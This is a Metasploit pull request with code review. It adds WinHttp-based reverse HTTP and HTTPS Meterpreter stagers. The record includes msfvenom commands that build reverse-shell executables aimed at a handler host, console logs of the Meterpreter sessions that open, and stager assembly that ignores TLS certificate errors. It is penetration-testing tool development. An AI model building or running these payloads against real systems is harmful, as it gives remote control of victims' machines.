### PR TITLE
HTTP and HTTPS stagers based on WinHttp

### PR DESCRIPTION
**Pull request by hdm**
This is a rework of @BorjaMerino 's PR #4608. This version switches to Metasm, includes a SSL stager, and fixes a few bugs. The WinHttp stack will allow us to support a lot of new features in the future and avoids many of the limitations of WinInet.

Tested against Windows 8.1 WoW64 as well as well Wine on Ubuntu 14.04 x86_64.

Generate big and small versions of both reverse_winhttp and reverse_winhttps:

```
./msfvenom -f exe -p windows/meterpreter/reverse_winhttp LHOST=192.168.0.4 LPORT=4444 -s 600 -o /scratch/reverse_winhttp_small.exe
./msfvenom -f exe -p windows/meterpreter/reverse_winhttp LHOST=192.168.0.4 LPORT=4444 -s 1000 -o /scratch/reverse_winhttp_big.exe
./msfvenom -f exe -p windows/meterpreter/reverse_winhttps LHOST=192.168.0.4 LPORT=4444 -s 600 -o /scratch/reverse_winhttps_small.exe
./msfvenom -f exe -p windows/meterpreter/reverse_winhttps LHOST=192.168.0.4 LPORT=4444 -s 1000 -o /scratch/reverse_winhttps_big.exe
```

Testing reverse_winhttp_small.exe (note the **small** URL length in the output below):

```
./msfconsole -q -x 'use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_winhttp; set LHOST 192.168.0.4; set LPORT 4444; run'
[*] Started HTTP reverse handler on http://0.0.0.0:4444/
[*] Starting the payload handler...
[*] 192.168.0.4:54302 Request received for /d2Ow...
[*] 192.168.0.4:54302 Staging connection for target /d2Ow received...
[*] Meterpreter session 1 opened (192.168.0.4:4444 -> 192.168.0.4:54302) at 2015-03-11 21:41:02 -0500

meterpreter > getuid
Server username: grunt\hdm
```

Testing reverse_winhttp_big.exe (note the **big** URL length in the output below):

```
./msfconsole -q -x 'use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_winhttp; set LHOST 192.168.0.4; set LPORT 4444; run'
[*] Started HTTP reverse handler on http://0.0.0.0:4444/
[*] Starting the payload handler...
[*] 192.168.0.4:54387 Request received for /N1zFtkuheKiYOGzCCwQg93d0TuETJ9swiEuzW8yz5S84obmqWHDH1mGuYwOI3HYsNjA9l70aWnIxuz1SkeAYe0EKIJS3rbNLNtfNthDOWfqbmobLi3Gwva74P7xLgo6nPq89rbg9cchpxjfw5Qnd0DuPSaOyGlh3reucgvbGn1R5BmzTnsiiUqcZkGw9EAoA6oJffQ9PrJENo2RNLqhTUReMwJ9D171SRHNTZnIUunG2m...
[*] 192.168.0.4:54387 Staging connection for target /N1zFtkuheKiYOGzCCwQg93d0TuETJ9swiEuzW8yz5S84obmqWHDH1mGuYwOI3HYsNjA9l70aWnIxuz1SkeAYe0EKIJS3rbNLNtfNthDOWfqbmobLi3Gwva74P7xLgo6nPq89rbg9cchpxjfw5Qnd0DuPSaOyGlh3reucgvbGn1R5BmzTnsiiUqcZkGw9EAoA6oJffQ9PrJENo2RNLqhTUReMwJ9D171SRHNTZnIUunG2m received...
[*] Meterpreter session 2 opened (192.168.0.4:4444 -> 192.168.0.4:54387) at 2015-03-11 21:41:29 -0500

meterpreter > getuid
Server username: grunt\hdm
```

Testing reverse_winhttps_small.exe (note the **small** URL length in the output below):

```
./msfconsole -q -x 'use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_winhttps; set LHOST 192.168.0.4; set LPORT 4444; run' 
[*] Started HTTPS reverse handler on https://0.0.0.0:4444/
[*] Starting the payload handler...
[*] 192.168.0.4:54483 Request received for /9ghT...
[*] 192.168.0.4:54483 Staging connection for target /9ghT received...
[*] Meterpreter session 1 opened (192.168.0.4:4444 -> 192.168.0.4:54483) at 2015-03-11 21:42:17 -0500

meterpreter > getuid
Server username: grunt\hdm
```

Testing reverse_winhttps_big.exe (note the **big** URL length in the output below):

```
./msfconsole -q -x 'use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_winhttps; set LHOST 192.168.0.4; set LPORT 4444; run' 
[*] Started HTTPS reverse handler on https://0.0.0.0:4444/
[*] Starting the payload handler...
[*] 192.168.0.4:54555 Request received for /KHOQo6u71VDtvRjZaJMn7dAytQejGKVMbTHRTMcNzkXltKwL0a2Npr3xNmpWKmBN1wbIXmuPw...
[*] 192.168.0.4:54555 Staging connection for target /KHOQo6u71VDtvRjZaJMn7dAytQejGKVMbTHRTMcNzkXltKwL0a2Npr3xNmpWKmBN1wbIXmuPw received...
[*] Meterpreter session 1 opened (192.168.0.4:4444 -> 192.168.0.4:54555) at 2015-03-11 21:42:55 -0500

meterpreter > getuid
Server username: grunt\hdm
```

### CODE REVIEW

**Comment by void-in** [comment]
Something not related to this module but I always thought the -o option of msfvenom was used for displaying the standard options of the module. Didn't know when that changed to output. The documents need to be updated e.g. http://www.offensive-security.com/metasploit-unleashed/Msfvenom

**Comment by bcook-r7** [comment]
There is a subtle difference in behavior here compared to reverse_tcp/reverse_http. The others will retry a bit, so you can start the stager before actually starting console, and it will still connect within a few seconds.  The behavior with winhttp is that the handler must be listening strictly before starting.

**Comment by hmoore-r7** [comment]
@bcook-r7 Thanks! The lack of retries is a problem and likely a bug on this end. I'll try to repro tonight and work out whatever the retry problem is.

**Comment by bcook-r7** [comment]
I bet its something weird with my headless windows 2012 r2 test server config. I do see retries and successful sessions on Windows 8.1. The wininet stager works fine on both.

**Comment by bcook-r7** [comment]
Closing in, its actually only winhttps that is having trouble - I had it twice in a row in my tests, so originally thought both stagers had issues. winhttp unencrypted actually worked fine. I can see the TLS 1.2 client hello now, so it is likely a handshaking issue with my instance of MSF...

File: lib/msf/core/payload/windows/reverse_winhttp.rb [hunk 1]
```diff
@@ -0,0 +1,306 @@
...
+    if opts[:ssl]
+      asm << %Q^
+        ; WinHttpSetOption (hInternet, WINHTTP_OPTION_SECURITY_FLAGS, &buffer, sizeof(buffer) );
+        set_security_options:
+          push 0x00003380
+            ;0x00002000 |        ; SECURITY_FLAG_IGNORE_CERT_DATE_INVALID
+            ;0x00001000 |        ; SECURITY_FLAG_IGNORE_CERT_CN_INVALID
+            ;0x00000200 |        ; SECURITY_FLAG_IGNORE_WRONG_USAGE
+            ;0x00000100 |        ; SECURITY_FLAG_IGNORE_UNKNOWN_CA
+            ;0x00000080          ; SECURITY_FLAG_IGNORE_REVOCATION
```
Comment (bcook-r7) [inline lib/msf/core/payload/windows/reverse_winhttp.rb]: SECURITY_FLAG_IGNORE_REVOCATION appears to break https auth for me, testing with Windows 8.1 and server 2012. It doesn't appear to be a valid flag in the current MSDN docs - is it from a previous WinHTTP version? https://msdn.microsoft.com/en-us/library/windows/desktop/aa384066(v=vs.85).aspx

Changing this to 0x00003300 allows the TLS handshake to succeed. Could you verify?

Comment (hmoore-r7) [inline lib/msf/core/payload/windows/reverse_winhttp.rb]: Doh. I must have mixed these up going through the WinInet flags. Double-checking and I only see the following defined:
```
#define SECURITY_FLAG_IGNORE_UNKNOWN_CA         0x00000100
#define SECURITY_FLAG_IGNORE_CERT_DATE_INVALID  0x00002000 
#define SECURITY_FLAG_IGNORE_CERT_CN_INVALID    0x00001000 
#define SECURITY_FLAG_IGNORE_CERT_WRONG_USAGE   0x00000200
```

**Comment by hmoore-r7** [comment]
In the first header I looked at (wine), two of the WinHTTP flags were defined as the WinInet constants, I must have tested the wrong output on Windows 8.1. Thanks for catching this. The latest commit to the branch fixes the flags.

**Comment by bcook-r7** [comment]
Looks good, and its so much easier debugging stagers now. Thanks!

**Comment by bcook-r7** [comment]
Done, great work all.

**Pull request merged**